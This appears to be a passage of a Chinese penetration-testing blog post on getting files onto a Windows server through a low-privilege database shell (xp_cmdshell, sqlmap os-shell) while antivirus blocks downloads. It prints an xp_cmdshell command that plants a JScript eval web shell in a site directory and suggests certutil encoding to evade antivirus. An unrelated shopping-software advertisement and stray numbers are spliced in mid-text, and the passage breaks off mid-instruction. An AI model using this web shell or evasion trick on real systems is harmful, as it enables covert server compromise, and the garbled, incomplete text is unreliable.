不知道各位小伙伴在渗透中是否遇见过这个问题:
虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。
本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。
话不多说,例如这样场景:
在数据库连接后或者sqlmap注入连接os-shell后可执行命令:
其中包括杀软或某狗、某盾:
此时下载文件的各种命令均被拦截:
bitsadmin:
certutil证书:
还会被杀软报警:
powershell也会被彻底封杀:
尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)
而在这种环境下可在有权限写入的前提下尝试写入一句话木马:
代码语言:javascript代码运行次数:0运行复制<code class="javascript">xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\WWW\bmfx.aspx'</code>
但也存在被某狗、WAF杀掉的可能。
在商业版本基础上修改发布的,无功能限制,无使用时间限制,功能全面扩展,版面美观大方,俱备完整的购物网站功能、购物方便,操作简单,在线支付功能,采用网银支付完美在线支付接口,对一些文件重新编写,减少了图片的使用,网站整体配色更加明朗v2.01修正2005个人免费版出现的问题
7
此时,骚操作上场,windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码:
本地:
代码语言:javascript代码运行次数:0运行复制<code class="javascript">Certutil -encode artifact.txt artifact.exe</code>
或指定路径:
代码语言:javascript代码运行次数:0运行复制
733
收藏
